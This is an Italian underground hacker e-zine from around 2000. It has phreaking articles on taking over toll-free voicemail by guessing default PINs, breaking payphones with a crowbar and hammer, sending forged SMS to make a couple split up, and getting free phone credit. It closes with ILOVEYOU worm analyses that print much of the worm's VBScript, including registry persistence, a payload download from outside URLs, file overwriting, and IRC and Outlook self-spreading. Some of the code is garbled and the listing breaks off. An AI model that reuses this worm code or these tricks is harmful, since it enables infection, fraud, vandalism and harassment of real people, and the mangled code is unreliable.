maggiorparte dei kasi sar sikuramente di 4 cifre... non solo perk il kodice
deve essere abbastanza corto da essere rikordato dagli inetti ke lavorano
alla segreteria... ma anke perk  usato spesso... bene... ora kapite bene ke
nella stragrande maggiorparte dei kasi il kodice  1234, usato standard in
molte segreterie... non sar certo una novit... seguono a secondo e terzo
posto di popolarit 0000 e 1111... se non vanno bene anke kuesti provate altre
composizioni semplici... tipo 5555 o 9876... successivamente il kodice deve
essere cambiato... il fatto sta ke nel mondo esistono molti pi mentekatti di
quanti ne possiamo immaginare... rabbrividiamo... brrrrrr....

 - 06 - Cosa ne faccio???
Un kazzo potrei dirvi... ma invece gli usi sono molti!!!
Se  una segreteria mono-casella potete usarla per iniziare a capire come
funzia il gioko del conquistare segreterie... infatti ne potete fare un uso
proprio... cio voi date il numero agli amici e loro vi lasciano messaggi ke
poi potrete ascoltare... inxomma proprio kome una segreteria ma su numero
verde... quindi completamente gratiz!!!
Mentre se avete trovato una segreteria multi-casella... il gioko si fa
pesantuccio perk esistono metodi per fare uscire chiamate verso altri numeri
partendo dal numero verde... ehehehehhe ma questo cambia da segreteria a
segreteria e quindi vi conviene lavorarci sopra parekkio...

 - 07 - I riski
Bene, dopo essermi documentato ben ben sono arrivato ad una conclusione nel
caso dell'illegalit di questi metodi... il fatto  ke non esisterebbe nessuna
legislazione ke ci impedisce di utilizzare una segreteria su numero verde...
naturalmente se la ditta a kui avete fottuto la segreteria vedendo nel
tabulato delle kiamate al numero vede ke la maggiorparte delle kiamate
proviene dallo stesso numero e vede anke ke il 90% del traffiko lo avete
ausato voi... potrebbe anke fare una denuncia... comunque voi agite per
lo pi da kabina... e poi non abbiate mai paura...

 - 08 - Ne potevi fare a meno???
Kredo proprio di si... komunque sono contento di essere ritornato di nuovo
nell'ambiente underground digitale e cyberpunk, e spero di continuare a
scrivere in queste e anke in altre riviste...

  * Note sull'autore *
mR_bIs0n  nato a a Santo Billo alla Pozzanghera nel 1984 (come aveva sempre
desiderato). Ha scritto molti artikoli per varie riviste, a volte senza
esserne consapevole. Partecipa ad eventi del tipo "La sagra del Prepuzio
fritto" e "Fiera degli spazzolini da denti". E'stato pi volte sposato.
Le mogli non lo sapevano.

---mR_bIs0n---

----------------------------------------------------[ pHreAkinG/Old info$ ]---
===] GUIDA ALL'ASSALTO DELLE CABINE DI MAMMINA TELEKOM [======================
-----[ /zOKA/ ]---------------------------------------------------------------


Consumo: 1 pacco di Camel Light da 10 ( cazzo quanto fumo!! =:),
1 bottiglia di coca da un litro

Rotture di coglioni: il cellulare
Musica ascoltata: Kaos - Fastidio
Fucks to: I FOTTUTI CARAMBA!! mi portate in caserma xch mi trovate
          farmi una kanna in un vikolo!! ma vaffankulo!!!
 
Adesso cominciamo:

Premesso: io non credo che si possa riuscire a smontare la cabina,
io ci ho provato e non  andato a buon fine ( servono chiavi 
particolari che ha solo mamma telekazz ), se conosci qualcuno
che ci  riuscito, con delle chiavi reperibili in ferramenta
fammi mandare un e mail a inkazzato_@hotmail.com in cui mi
spiega la tecnica e le chiavi da utilizzare

===] LO "SMONTAGGIO" DEI PEZZI [===

Allora, vi ricordo che non credo nello smontaggio, quindi, x i deboli di
cuore, cardiopatici e poliziotti  sconsigliata la visione =:)


LO "SMONTAGGIO" DI UN ROTOR:

Avete bisogno di: un cuneo ed uno zaino

Niente di pi facile, prendete o un cuneo o un piede di porco ( non ricordo
con quanti gradi di inclinazione, cmq il meno inclinato ) e infilatelo fra il
rotor e la cabina stessa e fate forza

LO "SMONTAGGIO" DI UNA CORNETTA:

Avete bisogno di: Solo le vostre mani

Anche questa  una cosa facilissima, fate fare al cavo della cornetta tanti
giri su se stesso ( HO DETTO TANTI!!! ) e quando si romper una parte della
"guaina" metallica, DATE UNO STRAPPO SECCO! Insomma, tirate forte e seccamente
( termini coniati adesso ) ..........cmq un microfono e un altoparlante fanno
comodo a casa =:)


UN SOUVENIR DA PRENDERE DALLE CABINE:

Avete bisogno di: un martello

Avete presente la cornice nelle cabine, quelle che di solito sono a sinistra
del telefono? ecco! su quel vetro un martello sbatte molto bene ( pi forte
che potete )!! appena il vetro si frantumer ( non vi preoccupate, non
schizza ) tirate via dal lato il foglio di plastica e occhio agli occhi
(kaxxo che allitterazione =:) che ora i vetri residui sopra e sotto schizzano!

VECCHI TRUCCHI INUTILIZZABILI ( Special thanks ai miei cugini Cristiano e
Danilo )

Le due schede: prendete una scheda coi soldi dello scatto alla risposta, e
chiamate, appena si esauriscono i soldi, prendete la seconda scheda ( pu
essere scarica oppur ci possono essere 15k dentro, kambia un kaxxo ) e
inseritela MA TRATTENETELA COL DITO!! mio cugino Cristiano parlava un ora da
Forl a Bari con 400 lire...... ora si accorgono e vi chiudono il tel. in
faccia e non saprete mai se la tipa con cui stavate parlando ve la da o no
(w i cellulari =:)

Lo switch: vecchia leggenda, ravanando dietro il display con una scheda come
se steste ( esiste sto verbo? =:) pulendo il cesso dovreste attivare uno
switch che vi libera la linea accreditandovi un bordello di soldi,
ho provato io, nessun esito, ma lo switch c'era, nei vecchi telefoni grigi di
15 anni fa =:)

Prima edizione: il 18 aprile 2000 finita alle 18:15
Seconda revisione: 22 maggio 2000 alle ore 23:16
Terza revisione: 1 Luglio 2000 alle ore 1:12
Questa guida  stata scritta da

  ^________^
 |!!!HeLp Me|
 |->/zOKA/<-|
 |Oh sHiT!!!|
 ------------

mailto: inkazzato_@hotmail.com - djanto@hotmail.com

P.S.

A breve, un articolo SOLO sullo smontaggio di una gabbia monete
"- oN wOrKiNg-"

---/zOKA/---


----------------------------------------------------[ pHreAkinG/Cellulars ]---
===] COME FAR LITIGARE 2 AMICI O FIDANZATI (FAKE SMS) [=======================
-----[ mR_bIs0n ]-------------------------------------------------------------


Indumenti: kannottiera giallognola, mutande altrettanto...
Musica ascoltata: The Doors - The End (e vi assicuro ke potrebbe bastare per
                  tutto l'art visto ke  di 11 min...)
                  Nirvana - Where did you sleep last night
                  Nirvana - Rape me
                  Nirvana - Smells like teen spirit
                  Nirvana - The Man Who Sold The World
                  Nirvana - Come as you are
                  Nirvana - On a plain
                  e molte altre...
Consumo: nulla visto ke mi sono appena alzato... umh... cmq potrei finirmi la
         pizza coi peperoni di ieri sera... mi pare sia rimasta anke un po'di
         koka kola...
Alla TV: spenta
All'aspirapolvere: mia madre ke mi sta rompendo i koglioni...

Saluti a: Panino, Biby, Carmine, nonk a XaRaBaS, Meriak, Oldiron, Dante,
          Nobo, Zero, |M4X|, e magari ki mi sto dimentikando... ah
          l'immankabile Giorgio Qulo....

Fuck to: la skuola anke se  finita, il pullotto pieno di merda skifosa
         puzzolente ke rompe i koglioni se io e i miei amici ci mettiamo a
         giokare a calcio nel kampo vicino kasa (illegalmente)...

Dedikato a: tutte le belle ragazze, soprattutto perk di sto periodo non ho
            una ragazza in partikolare... uff... e ke ci devo fare, hanno 16
            anni e si trovano il ragazzo ultraquarantenne ke percepisce la
            pensione...

***
 ______________________________________________________________
/                                                              \
| Benvenuti anke oggi nel fantastiko mondo della Melevisione!!! |
\______________________________________________________________/

Oggi ero molto provato quindi mi andava di scrivere kos...
Mettiamo ora ke, mentre vi state guardando in pace la Melevisione, vi
rikoradate ke un koglione forte, e ripeto, moooolto forte, ha kome ragazza una
stupenda tettona... oki avete tutt'e due i numba di cell??? Oki, ora da
perfetti bastardi li farete litigare... kome? Uhuh, ve lo dice mR_bIs0n...
nono, non vi preokkupate, non pagate nulla...

Mucho bien (quando ho scritto kos mi sono sentito male assumendo questa
faccia :-)... pensate kuando sto bene...), ora vi kollegate immediatamente al
sito www.gsmbox.com (da non scrivere www.gsm box.com perk ci sono dei
koglioni ke lo fanno...), ora al men a sinistra c' la voce "SMS Firmati"...

Accedete alla sezione, vi registrate inserendo dati fasulli (attenzione ke
vogliono sapere anke kuanti peli ha nel kulo vostro nonno...), mettendo per
il numero di cellulare giusto, quello ke mander dei brutti sms, non il numba
di quello ke li ricever... sceglietevi una buona user e pass... oki fatto
tutto ci, entrate nella sezione e mandsate gli sms kon tanti insulti...
rikordatevi ke gli sms avranno kome mittente quello ke avete scelto
divertitevi... magari se vi passa per la testa fatemi konoscere la bella
ragazza tettona ke avete fatto lasciare kol koglione...

ATTENZIONE INKONVENIENTE...
Quei maledetti bastardi della GSMBOX inseriskono alla fine di ogni sms la
scritta "- by GSMBOX -", ne potevano fare proprio a meno, ma purtroppo...
vedete un po'voi kome raggirare il problem... magari mandandone altri sempre
kos facendo kapire ke lo si inserisce sempre...

CIAOOOOOOOOOOOOOOOOOOOooooooooooooooooooooooo........................

---mR_bIs0n---


----------------------------------------------------[ pHreAkinG/Cellulars ]---
===] RICARICARE IL CELLULARE (A GRATIS!) [====================================
-----[ mR_bIs0n ]-------------------------------------------------------------
NEWZ DA mR_bIs0n, l'uniko phreaker nel suo paese!!!

EILAAAAA mando sto art, ke  pi un messaggio veloce veloce... sikuramente
parekkie persone si kiedono kome fare per rikarikarsi gratiz il cell tim...
bene se avete l'autorikarika 190 potete sfruttare un partikolare metodo...

Sapete bene ke se arrivono sms da un numero TIM vi dovrebbe addebitare non
so'quanta konversazione... bene, molti dicevano di mandare sms da internet dal
sito www.loxxxxxxxcom.it... io invece vi konsiglio di usare il metodo ke vi ho
deskritto nell'art sempre su questo numero di AIS "Come far litigare due amici
o fidanzati e, di conseguenza, goderne...", infatti potete mettere qualsiasi
numero di tim e mandarvi sms a sbafo rikarikandovi il cell... fatene buon
uso... ah dimentikavo...  kompletamente legale... 
CIAO!!!

---mR_bIs0n---

------------------------------------------------------------------[ vIrIi ]---
===] ANALISI DEL VIRUS "ILOVEYOU" ]===========================================
-----[ Away ]-----------------------------------------------------------------

 www.nails.cjb.net     away@subdimension.com

Prefazione:
Non ci posso credere!!! un virus troppo coglione che ha infettato mezzo
mondo!!! la CIA infettata!!!! incredibile...
cmq, a parte il grande rumore generato da tale virus, mi  sembrato utile
fare questo file di analisi - completo di sorgente - a scopo puramente
informativo, quindi se ve lo modificate e fate cazzate, io non mi assumo
alcuna responsabilit. E' semplice informazione. Non speditelo, non infettate
nessuno e non rompete il cazzo al prossimo...:) io ve l'ho detto 
Ad ogni modo, pu essere una buona occasione (lo  stata per me) per
imparare qualcosina in VBS, che fa sempre comodo.
Inoltre otterrete informazioni aggiuntive per le precauzioni nei confronti
di tale metodologia di virus -> detto in italiano, saprete difendervi
meglio dopo aver letto, almeno sapete dove guardare per capire se siete
infetti...ad ogni modo, iniziamo.

Descrizione:
Il virus  uno script realizzato in vbs. Arriva per email con un messaggio
il cui subject  "ILOVEYOU". In allegato a tale messaggio c' il virus, col 
nome Iloveyou.vbs. Se non si accede all'allegato, il virus non  operativo. 
Ma analizziamolo meglio col sorgente completo! :)

Ecco qua:
(i REM in maiuscolo li ho aggiunti io....)

./NOTA DELLA REDAZIONE\.

=[ IL CODICE SORGENTE E' DISPONIBILE IN FORMATO ZIPPATO X EVITARE DI FARE ]=
        -[ ALLARMARE L'ANTIVIRUS OGNI VOLTA CHE APRITE L'E-ZINE! ]-

./FINE NOTA DELLA REDAZIONE\.

Quindi ricapitolando, che fa sto virus?
-si duplica nel vostro hd nella directory windows sotto diversi nomi e
 inserisce delle chiavi nel registry in modo che venga invocato ogni volta che
 si apre il winzoz;
-scarica un altro virus dal net tramite il browser e lo inserisce nel 
 registry;
-infetta immagini, mp3, file di script, una marea di roba....e qua sono i
 danni!!!
-inserisce uno script nel mIRC per auto-inviarsi via chat in tutti i canali in
 cui andate....
-si spedisce automaticamente anche a tutti gli indirizzi nel vostro address
 book di outlook.

E' un buon esempio di programmazione per capire come fare diverse cose utili
col VBS (agire sul registry, sui files, email...).
Ad ogni modo non riesco a capire come la CIA si sia fatta infettare da una
robetta cos idiota...
Nei giorni successivi, si sono visti in giro diversi altri virus, varianti di
questo, nonch le case produttrici di virus ne hanno approfittato per update
(chi gratis, chi a pagamento...), ma comunque se avete capito il  meccanismo,
 abbastanza facile da eliminare se siete infetti, anche se vi arrivasse per
email, non aprite semplicemente gli allegati, date un'occhiata alle
impostazioni  del vostro client di posta elettronica e, che dirvi, imparate,
imparate, imparate...e sperimentate! ;)

Per concludere:
un p di email interessanti che mi sono arrivate sul virus ....

Subject: {V-L} Now they even try to make money with VBS.ILoveYou

> Date sent:              Fri, 05 May 2000 10:26:57 -0400
> From:                   Admin <info@Aquari.net>
> Subject:                URGENT Re: Virus Domains
> To:                     Admin <info@Aquari.net>
> 
> Hello,
> 
> As you know in the past 24 hours a virus as spread across
> the world. Yesterday afternoon we undertook to purchase
> domain names related to the virus in order to offer a
> solution to seekers and promote our services. We would like
> to offer you the chance to promote your anti-virus services
> by using one or several of these domain names;
> 
>   vbs-loveletter.com          
>   vbsloveletter.com           
>   vbsloveletter.net           
>   vbsloveletter.org           
>   vbslovelettervirus.com      
>   lovelettervirus.net         
>   loveletterworm.com          
>   iloveyoubug.com                
>   iloveyoubug.net                
>   iloveyoubug.org                
>   iloveyouworm.com               
>   iloveyouantidote.com           
>   iloveyouantidote.net           
>   iloveyouantidote.org           
>   jokevirus.net (Virus new name)
>   veryfunnyvirus.com (Virus new name)
>   pandacan.com (City where perpetrator is located)
> 
> All of these domains will be actively available to the
> world by mid-day today, therefore, time is of the essence.
> If you are interested, please contact us by phone
> at (514) 908-0-908. 
> 
> Andy Srougi
> President
> Aquari.net inc.
> info@Aquari.net

insomma, c' gente che pur di fare un p di soldi....ehehee

Subject: {V-L} Here are a Killer for Iloveyou Letter

Hello Peoples !


Here are a Killer for the Virus. I.Love.you.VBS
allegato [] Kill.Iloveyou.vbs
   

c' gente che spaccia il virus per un antivirus....occhio eh?!?

Sempre da un email, mi si informa che:
Dal sito http://www.quickheal.com  possibile scaricare l'utility per 
identificare ed eliminare  il nuovo virus "I love you".     

A tutto questo voglio aggiungere una email che mi  pervenuta, di 
Santo-Satanello (col quale spero non ci saranno problemi per questo
cut & paste...ok?):

Subject: I LOVE CUCARACHA! Non se ne pu pi!!!
To: Anarchy in the System <aisprodML@listbot.com>

E' incredibile, siamo nel medio evo dell'era
informatica! 1000 Anni fa, si veniva puniti dalla gente, torturati
e messi al rogo se si veniva sospettati di essere untori, e noi li
critichiamo da grande popolo colto snobbando e criticando quelle che
definiamo credenze popolari. Oggi le cose non sono cambiate; basta avere
un minimo di potere nella comunicazione di massa per trasformare un
software da 5Kbyte quasi del tutto inoffensivo se non verso alcuni
programmi per trasformarlo in una calamit mondiale! E nel giro di
una settimana al massimo non se ne parla pi... E cos la prassi si
ripete, anche se in tempi un p pi moderni: si viene prelevati da quei
tizi oscuri del Federal Bureau o qualche altra organizzazione, si
viene interrogati, e imprigionati a loro discrezione.......
L'altra grande catastrofe informatica doveva essere il temuto e oscuro
Millennium Bug, dove sembrava che tutti gli spazzolini da denti
elettrici si dovessero fermare di colpo mettendo a repentaglio l'igene
orale della popolazione del pianeta!
Ecco, mi sento un ingenuo, i miei 21 anni non bastano per spiegarmi come
mai ai giornalisti piace fare cos tanto allarmismo! Oppure c' un giro
di interessi tale per cui conviene farlo? Se  cos mi metto subito al
lavoro per fare un macrovirus polimorfico in assembler (ma che vuol
dire?) che con fare ritmico permette a tutte le schede madri di tutti i
computer del mondo (pentagono compreso! E' d'obbligo!!!) di ballare la
cucaracha!!! Consigliatemi se potete, una direzione verso cui
guardare! Saluti dall'antichit, sperando in tempi migliori..................
                                          
-sAnto.sAtanello-

Niente da aggiungere a quanto detto.

Note Finali: il tipo che ha fatto il virus  stato beccato, non si sa
ancora cosa rischia, a quanto ne so  stato beccato dalla caller-id (cio
dall'identificativo di chiamata al provider...occhio...), meditate...
La Microsfot ha annunciato che presto uscir una patch per il suo
GuardaFuori Espresso (cos lo chiama un mio amico, hi mav!) per evitare
l'autopreview degli allegati, anche qua non possiamo fare altro che
ringraziare lo zio bill per il suo software efficiente....:))

Questo  tutto.
Avete un'idea per una modifica interessante? Ho detto qualche cazzata?
Ne avete fatto uno pi bello? speditemelo che se ne riparla
(ovviamente zippato, che altrimenti vi inc*lo...:)	
Alla prossima,

---Away---

------------------------------------------------------------------[ vIrIi ]---
===] "ILOVEYOU" THE DEBUG ]===================================================
-----[ ValK ]-----------------------------------------------------------------
                                                                             
  ovvero come zio bil si
 frega con le proprie mani
 _________________________
|***     PREMESSA      ***|
 
 *** io non uso virgole ***

Diamo inizio all'avventura ;)
ok.
Essendo io un appassionato di visula basic mi risulto' facile all'epoca 
(eh eh eh quanto tempo)disattivare questa sottospece di worm che si infilo' 
tra le lettere delle mie spasimanti con la poco sospetta (e' sarcasmo) 
scritta :  " I LOVE YOU "
p.s. i need your body now (eh eh eh)

Appena aperto il verme schifoso mi nascose i miei inportantissimi mp3 ('tacci 
sua...) e li' mi adirai parekkio, allora prendo quella lettera strana 
arrivatami diedi uno sguardo con la debbuger script machine di Zio sBill 
Gate$ tm trovare l'infame nascosto e in ke linguaggio tra i piu' lamer era 
scritto??? IN VBScript!!!! 

FU LA SUA MORTE 

 _____________________
|                     |
| QUI GIACE IL        |
| MALEDDETTO    _|_   |
| VERMACCIO      |    |
| SCHIFOSO       |    |
|                     |
|                     |
                    
scovai ogni call ogni file da  lui creato ogni chiamata a strutture  di 
sistema.
All'inizio pensavo fosse qualke kazzate ci avevo perso in fin dei conti solo 
6 ore... ma poi la bestia chiamata  MASS MEDIA lo scopri' e fu cosi' che oltre
a fa' danni fu pure famoso azz... cmq cosa fa' i love u oltre all'illusione 
di essere amati?

E' quello che scopriremo

ECCOVI:

I LOVE U -debbuged-

Okiz sappiate che farlo nonn e' stato facile quanto disinnescarlo.
E cmq per fare una pazzia del genere dovevo essere pippato o kess'io, sappiate
solo una kosa:

NON LO RIFAREI!!!!!!
tempo impiegato: 13 ore


********************************************
*        ECCO IL SORGENTE DI LL4U          *
********************************************
       
<ndr: Stesso discorso di sopra....>

*******************************************
*                                         *
*       ED ECCO A VOI IL DEBUG !!!!!      *
*                                         *
*******************************************


<------- inizio codice ------->
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject(]-]WScript.Shell]-])
rr=wscr.RegRead(]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%
   -%Windows Scripting Host%-%Settings%-%Timeout]-])
if (rr>=1) then
wscr.RegWrite ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%
   -%Windows Scripting Host%-%Settings%-%Timeout]-],0,]-]REG_DWORD]-]
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem =Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&]-]%-%MSKernel32.vbs]-])
c.Copy(dirwin&]-]%-%Win32DLL.vbs]-])
c.Copy(dirsystem&]-]%-%LOVE-LETTER-FOR-YOU.TXT.vbs]-])
regruns()
html()
spreadtoemail()
listadriv()
end sub
<------- fine codice ------->


********* DEBUG ***********

eh eh eh eh
cosa fa' il sub main? crea un oggetto shell nel vbscript, legge delle chiavi 
del registro se gia' siete infetti kade se no!!!!!
CHE IL WORM VI INVADA
scrive nel registro che siete infettati

si setta un po' di dir 
{
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem =Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
}

si apre il suo bel file, e vi schiaffa i file :
{
MSKernel32.vbs
Win32DLL.vbs
LOVE-LETTER-FOR-YOU.TXT.vbs
}

e chiama le funzioni:
{
regruns()
html()
spreadtoemail()
listadriv()
}

<------- inizio codice ------->

sub regruns()
On Error Resume Next
Dim num,downread
regcreate ]-]HKEY_LOCAL_MACHINE%-%Software%
        -%Microsoft%-%Windows%-%CurrentVersion%-%Run%
           -%MSKernel32]-],dirsystem&]-]%-%MSKernel32.vbs]
regcreate ]-]HKEY_LOCAL_MACHINE%-%Software%-%Microsoft%-%Windows%
            -%CurrentVersion%-%RunServices%-%Win32DLL]-],dirwin&]-]%
              -%Win32DLL.vbs]-]
downread=]-]]-]
downread=regget(]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%
           -%Internet Explorer%-%Download Directory]-])
if (downread=]-]]-]) then
downread=]-]c:%-%]-]
end if
if (fileexist(dirsystem&]-]%-%WinFAT32.exe]-])=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate ]-]HKCU%-%Software%-%Microsoft%-%Internet Explorer%-%Main%
         -%Start Page]-],]-]http://www.skyinet.net/~young1s/
           HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/
             WIN-BUGSFIX.exe]-]
elseif num = 2 then
regcreate ]-]HKCU%-%Software%-%Microsoft%-%Internet Explorer%-%Main%
          -%Start Page]-],]-]http://www.skyinet.net/~angelcat/
        skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/
            WIN-BUGSFIX.exe]-]
elseif num = 3 then
regcreate ]-]HKCU%-%Software%-%Microsoft%-%Internet Explorer%-%Main%
      -%Start Page]-],]-]http://www.skyinet.net/~koichi/
     jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe]-]
elseif num = 4 then
regcreate ]-]HKCU%-%Software%-%Microsoft%-%Internet Explorer%-%Main%-%Star
      -%Main%-%Start Page]-],]-]http://www.skyinet.net/~chu/
        sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglk
            NBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe]-]
end if
end if
if (fileexist(downread&]-]%-%WIN-BUGSFIX.exe]-])=0) then
regcreate ]-]HKEY_LOCAL_MACHINE%-%Software%-%Microsoft%-%Windows%
   -%CurrentVersion%-%Run%-%WIN-BUGSFIX]-],downread&]-]%-%WIN-BUGSFIX.exe]-]
regcreate ]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%Internet Explorer%
     -%Main%-%Start Page]-],]-]about:blank]-]
end if
end sub

<------- fine codice ------->

********* DEBUG ***********

si crea i suoi bei LinK nel registro ai file .vbs di prima

vede se avete settata la dir di download di msexplorer se no la setta su c:\
poi si scarica un file da dei link in una  sequenza random tra quelli scelti
dal malvivente che ha programmato sta' mezza schifezza.
...E ve la mette come autorun all'avvio del pcozzo


<------- inizio codice ------->
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&]-]%-%]-])
end if
Next
listadriv = s
end sub
<------- fine codice ------->

********* DEBUG **************
questa routine semplicemente verifica se esistono + hd e se si ci usa sopra la
funzione folderlist


 ********DEBUG********
*                     *
*    HIS CORE NOW!    *
*                     *
 *********************

Eccolo!!!! e' lui !!! il cuore!! e la mente del LL4U (non e' Lesuire-suite 
Larry 4 ma Love Letter 4 U) ho deciso di dividerlo in parti + piccole perche' 
come routine era troppo grande



 **************************************
*<------- inizio codice mastro ------->*
 **************************************

	<------- inizio codice slave 1 ------->
sub infectfiles(folderspec)  
On Error Resume Next
dim f,f1,fc,extdim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext=]-]vbs]-]) or (ext=]-]vbe]-]) then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext=]-]js]-]) or (ext=]-]jse]-]) or (ext=]-]css]-]) or (ext=]-]wsh]-]) 
 or (ext=]-]sct]-]) or (ext=]-]hta]-]) then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
	<------- fine codice slave 1 ------->

************** DEBUG *****************
allora qui il verme si becca la base  della forlder passatagli da listadriv()
e la in f, poi si becca tutti i file della forlder eli schiaffa in fc, di 
seguito per ogni fc in f1 si prende la path base e la scariva, in lettere 
minuscole, nella var ext SE trova file con l'estenzione vbs o vbe apre questo 
file e ci scrive dentro al suo interno la directory dove si e' nascosto sto 
schifoso vermaccio,ALTRIMENTI se trova file con estensione:

js, jse, css, wsh, sct, hta
fa' la stessa cosa di prima....


	<------- inizio codice slave 2 ------->
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&]-]%-%]-]&bname&]-].vbs]-])
fso.DeleteFile(f1.path)
elseif(ext=]-]jpg]-]) or (ext=]-]jpeg]-]) then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.patt cop=fso.GetFile(f1.path)
cop.copy(f1.path&]-].vbs]-])
fso.DeleteFile(f1.path)
elseif(ext=]-]mp3]-]) or (ext=]-]mp2]-]) then
set mp3=fso.CreateTextFile(f1.path&]-].vbs]-])
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
	<------- fine codice slave 2 ------->

*********** DEBUG ***************
allora si mette in bname il nome base del DEL FILE contenuto in f1, poi si 
carica le proprieta' del suddetto file poi se l'estenzione e' jpg o jpeg apre 
il file e ci copia dentro la posizione nell'hd del worm malefco.
In seguito il file viene preso se il file e' di estensione .mp3 o .mp2 crea un
file identico a lui .vbs col suo codice malefico, poi gli da' come attributo 
hide (nascosto)


	<------- inizio codice slave 2 ------->
if (eq<>folderspec) then
if (s=]-]mirc32.exe]-]) or (s=]-]mlink32.exe]-]) or (s=]-]mirc.ini]-]) or 
    (s=]-]script.ini]-]) or (s=]-]mirc.hlp]-]) then
set scriptini=fso.CreateTextFile(folderspec&]-]%-%script.ini]-])
scriptini.WriteLine ]-][script]]-]
scriptini.WriteLine ]-];mIRC Script]-]
scriptini.WriteLine ]-];  Please dont edit this script... mIRC will corrupt, 
  if mIRC will]-]
scriptini.WriteLine ]-]     corrupt... WINDOWS will affect and will not run 
  correctly. 
  thanks]-]
scriptini.WriteLine ]-];]-]
scriptini.WriteLine ]-];Khaled Mardne ]-];Khaled Mardam-Bey]-]
scriptini.WriteLine ]-];http://www.mirc.com]-]
scriptini.WriteLine ]-];]-]
scriptini.WriteLine ]-]n0=on 1:JOIN:#:{]-]
scriptini.WriteLine ]-]n1=  /if ( $nick == $me ) { halt }]-]
scriptini.WriteLine ]-]n2=  /.dcc send $nick ]-]&dirsystem&]-]%
  -%LOVE-LETTER-FOR-YOU.HTM]-]
scriptini.WriteLine ]-]n3=}]-]
scriptini.close
eq=folderspec
end if
end if
next  
end sub
	<------- fine codice slave 2 ------->

*********** DEBUG ***************
se invece il file che trova e' 

mirc32.exe
mlink32.exe
mirc.ini
script.ini
mirc.hlp

crea il file script.ini e ci schiaffa dentro il codice che fara' poi in modo 
che mentre si joina in un kanale e uno dopo di noi ci joina appresso al nuovo 
joinato gli mandate il file:

LOVE-LETTER-FOR-YOU.HTM
cosi' da infettare anke lui


<------- fine codice mastro ------->

*********** DEBUG ***************
GOOD LUCK! E LEGGETE SOPRA

<------- inizio codice ------->

sub folderlist(folderspec)  
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)  
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next  
end sub

<------- fine codice ------->

*********** DEBUG ***************
passando a questa sub un valore corrispondente ad una cartella

poi schiaffa ogni sf (sub folder) nel valore f1
poi lancia la sub infectfiles e di nuovo se stessa di modo da eseguire la sub 
infectfiles per ogni sub folder


<------- inizio codice ------->

sub regcreate(regkey,regvalue)
Set regedit = CreateObject(]-]WScript.Shell]-])
regedit.RegWrite regkey,regvalue
end sub

<------- fine codice ------->

*********** DEBUG ***************
questa sul del kakkio si krea un link nel registro.


<------- inizio codice ------->

function regget(value)
Set regedit = CreateObject(]-]WScript.Shell]-])
regget=regedit.RegRead(value)
end function

<------- fine codice ------->

*********** DEBUG ***************
questa function legge dal registro un valore che noi gli inseriamo come 
argomento [qui "value" ]


<------- inizio codice ------->

function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

<------- fine codice ------->

*********** DEBUG ***************
questa function fa' il check di un file se questo file esiste restituisce 1 
esiste altrimenti restituisce 0

<------- inizio codice ------->

function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

<------- fine codice ------->

*********** DEBUG ***************
questa function fa' il check di una directory se questo file esiste 
restituisce 1 esiste altrimenti restituisce 0


<------- inizio codice ------->

sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject(]-]WScript.Shell]-])
set out=WScript.CreateObject(]-]Outlook.Application]-])
set mapi=out.GetNameSpacfset mapi=out.GetNameSpace(]-]MAPI]-])
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead(]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]
  -]&a)
if (regv=]-]]-]) then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=]-]]-]
regad=regedit.RegRead(]-]HKEY_CURRENT_USER%-%Software%-%Microsoft%-%WAB%-%]
 -]&malead)
if (regad=]-]]-]) then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = ]-]ILOVEYOU]-]
male.Body = vbcrlf&]-]kindly check the attached LOVELETTER coming from me.]-]
male.Attachments.Add(dirsystem&]-]%-%LOVE-LETTER-FOR-YOU.TXT.vbs]-])
male.Send
